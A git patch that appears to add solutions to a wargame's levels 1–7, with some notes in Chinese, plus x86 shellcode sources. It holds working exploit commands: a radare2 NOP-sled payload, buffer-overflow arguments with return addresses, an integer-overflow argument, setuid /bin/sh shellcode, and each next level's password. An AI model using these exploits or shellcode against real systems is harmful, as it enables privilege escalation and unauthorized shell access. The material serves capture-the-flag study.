From 62d1287693cbb282570c52f44bfcc0be0e590d7f Mon Sep 17 00:00:00 2001 From: Iru Cai Date: Fri, 5 Oct 2018 17:41:48 +0800 Subject: level 1~7, shellcode --- level01 | 2 ++ level02 | 8 ++++++++ level03 | 4 ++++ level04 | 7 +++++++ level05 | 4 ++++ level06 | 22 ++++++++++++++++++++++ level07 | 15 +++++++++++++++ shellcode/exec-reloc-nozero.S | 10 ++++++++++ shellcode/exec-reloc.S | 11 +++++++++++ shellcode/exec-suid.S | 21 +++++++++++++++++++++ shellcode/exec-suid.asm | 19 +++++++++++++++++++ shellcode/exec.S | 8 ++++++++ shellcode/exec.asm | 8 ++++++++ 13 files changed, 139 insertions(+) create mode 100644 level01 create mode 100644 level02 create mode 100644 level03 create mode 100644 level04 create mode 100644 level05 create mode 100644 level06 create mode 100644 level07 create mode 100644 shellcode/exec-reloc-nozero.S create mode 100644 shellcode/exec-reloc.S create mode 100644 shellcode/exec-suid.S create mode 100644 shellcode/exec-suid.asm create mode 100644 shellcode/exec.S create mode 100644 shellcode/exec.asm diff --git a/level01 b/level01 new file mode 100644 index 0000000..68c986d --- /dev/null +++ b/level01 @@ -0,0 +1,2 @@ +just disassemble it +level02 XNWFtWKWHhaaXoKI diff --git a/level02 b/level02 new file mode 100644 index 0000000..38f1ca9 --- /dev/null +++ b/level02 @@ -0,0 +1,8 @@ +level2: +abs(0x80000000) = 0x80000000 is still negative +0x80000000/(-1) will trigger a division exception + +level2_alt: +note that NAN is not smaller or higher than any number + +level03 OlhCmdZKbuzqngfz diff --git a/level03 b/level03 new file mode 100644 index 0000000..3fe4a90 --- /dev/null +++ b/level03 @@ -0,0 +1,4 @@ +just a buffer overflow +note that if the input is too long, it'll override the value of argv, which will cause a segfault when trying to get the value of argv[1] + +level04 7WhHa5HWMNRAYl9T diff --git a/level04 b/level04 new file mode 100644 index 0000000..9f01fcb --- /dev/null +++ b/level04 @@ -0,0 +1,7 @@ +level04: +just modify $PATH + +level04_alt: +the IFS attack seems not working, someone said using shellshock + +level05 DNLM3Vu0mZfX0pDd diff --git a/level05 b/level05 new file mode 100644 index 0000000..22154c5 --- /dev/null +++ b/level05 @@ -0,0 +1,4 @@ +buffer overflow, stack is randomized, put shellcode after return address and pad nops +shellcode: should use setresuid first + +level06 fQ8W8YlSBJBWKV2R diff --git a/level06 b/level06 new file mode 100644 index 0000000..9e18250 --- /dev/null +++ b/level06 @@ -0,0 +1,22 @@ +考虑到栈地址随机化,而 +struct UserRecord{ + char name[40]; + char password[32]; + int id; +}; +只有72字节的空间可供攻击者填写,因此考虑将shellcode置于环境变量中。 +经过调试发现,环境变量放在 0xc0000000 之前的区域中,假设原环境变量共有 X 字节,则只要在环境变量中写一段 ``X字节nop + shellcode + X字节nop``,把栈溢出的返回地址改写为 +0xc0000000 - 2X - size(shellcode),那么便可以执行环境变量中的 shell code. 通过 ``env | wc -c`` 可看出环境变量小于 512 字节,让 X 为 512 即可。 +此外 greeting 到 ebp 处的距离为 0x48 字节,加上 old ebp 和返回地址为 0x50 = 80 字节,而我们只能往 UserRecord 写 72 字节,因此需要将 LANG 设为 fr 或 de 使得 greeting 开头更长一些。 + +r2 malloc://2048 +[0x00000000]> 512 wxs 90 +[0x00000200]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80 +[0x0000022f]> 512 wxs 90 +[0x0000042f]> wtf /tmp/shell.bin 0x42f @ 0 + +export A=`cat /tmp/shell.bin` +export LANG=de +/levels/level06 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `printf '0123456789012345678901234\xc0\xfb\xff\xbfaaaaa'` + +level07 U3A6ZtaTub14VmwV diff --git a/level07 b/level07 new file mode 100644 index 0000000..36a0bc8 --- /dev/null +++ b/level07 @@ -0,0 +1,15 @@ +注意以下代码中 count 是有符号数,只要使 count 为负数,而 count * sizeof(int) 为一个比较小的整数,则既能绕过 count >= 10 的检测,又能使程序正常运行:: + + int count = atoi(argv[1]); + int buf[10]; + if(count >= 10 ) + return 1; + memcpy(buf, argv[2], count * sizeof(int)); + +经过逆向,buf 的地址是 ebp-0x48,count 的地址是 ebp-0xc,因此一共需要写 0x40 字节。我们让 count = 0x80000000 | (0x40 / sizeof(int)) = 0x80000010 = -2147483632 即可。 + +顺便说一下,这关通过的条件是 count == 0x574f4c46,就是字符串 FLOW,暗示了是整数溢出。 + +/levels/level07 -2147483632 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abFLOW + +level8 VSIhoeMkikH6SGht diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S new file mode 100644 index 0000000..f5e2765 --- /dev/null +++ b/shellcode/exec-reloc-nozero.S @@ -0,0 +1,10 @@ +.global _start +_start: + xorl %eax,%eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + int $0x80 diff --git a/shellcode/exec-reloc.S b/shellcode/exec-reloc.S new file mode 100644 index 0000000..077babb --- /dev/null +++ b/shellcode/exec-reloc.S @@ -0,0 +1,11 @@ +.global _start +_start: +movl $11, %eax +call next +next: +movl (%esp), %ebx +addl $(_cmd-next), %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S new file mode 100644 index 0000000..94ec68a --- /dev/null +++ b/shellcode/exec-suid.S @@ -0,0 +1,21 @@ +.global _start +_start: + xorl %eax, %eax + addb $201, %al # geteuid + int $0x80 + movl %eax, %ebx + movl %eax, %ecx + movl %eax, %edx + xorl %eax, %eax + addb $208, %al # setresuid + int $0x80 + xorl %eax, %eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 diff --git a/shellcode/exec-suid.asm b/shellcode/exec-suid.asm new file mode 100644 index 0000000..b978195 --- /dev/null +++ b/shellcode/exec-suid.asm @@ -0,0 +1,19 @@ +xor eax, eax +add al, 201 +int 0x80 +mov ebx, eax +mov ecx, eax +mov edx, eax +xor eax, eax +add al, 208 +int 0x80 +xor eax, eax +add al, 11 +mov ebx, 0x3058431f +xor ebx, 0x30303030 +push ebx +push 0x6e69622f +mov ebx, esp +xor ecx, ecx +xor edx, edx +int 0x80 diff --git a/shellcode/exec.S b/shellcode/exec.S new file mode 100644 index 0000000..660057b --- /dev/null +++ b/shellcode/exec.S @@ -0,0 +1,8 @@ +.global _start +_start: +movl $11, %eax +leal _cmd, %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec.asm b/shellcode/exec.asm new file mode 100644 index 0000000..ca8960d --- /dev/null +++ b/shellcode/exec.asm @@ -0,0 +1,8 @@ +mov al, 0x70 +sub al, 0x65 +mov ebx, 0x30584361 +xor ebx, 0x3030304e +push ebx +push 0x6e69622f +mov ebx, esp +int 0x80 -- cgit v1.2.3